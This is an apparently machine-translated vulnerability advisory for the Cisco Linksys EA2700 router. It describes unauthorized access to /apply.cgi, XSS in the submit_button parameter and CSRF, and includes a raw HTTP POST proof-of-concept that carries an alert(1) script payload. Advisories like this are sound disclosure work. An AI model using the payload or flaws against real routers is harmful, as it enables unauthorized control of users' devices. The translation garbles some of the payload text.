Release date:
Updated on:
Affected Systems:
Cisco Linksys EA2700
Description:
--------------------------------------------------------------------------------
Bugtraq id: 59054
The Cisco Linksys EA2700 is a smart Wi-Fi router.
Cisco Linksys EA2700 (firmware version 1.0.12.128947) has multiple security vulnerabilities. Malicious users can exploit this vulnerability to execute cross-site scripting and request forgery attacks, and bypass certain security restrictions. These vulnerabilities are due to the absence of correct restrictions on/apply. cgi Script Access causes unauthorized access to device settings;/apply. the value of the "submit_button" POST parameter in cgi is not properly filtered, causing arbitrary HTML and script code to be executed in the affected site user's browser. The application does not check the validity of the HTTP request, attackers can control device settings.
<* Source: Phil Purviance
Link: http://www.securelist.com/en/advisories/52985
Https://superevr.com/blog/2013/dont-use-linksys-routers/
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
POST/apply. cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv: 13.0) Gecko/20100101 Firefox/13.0.1
Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8
Accept-Language: en-us, en; q = 0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Submit_button = xss & #39; % 3 balert (1) // 934 & amp; action = Apply
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Cisco
-----
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.linksys.com/en-eu/products/routers/EA2700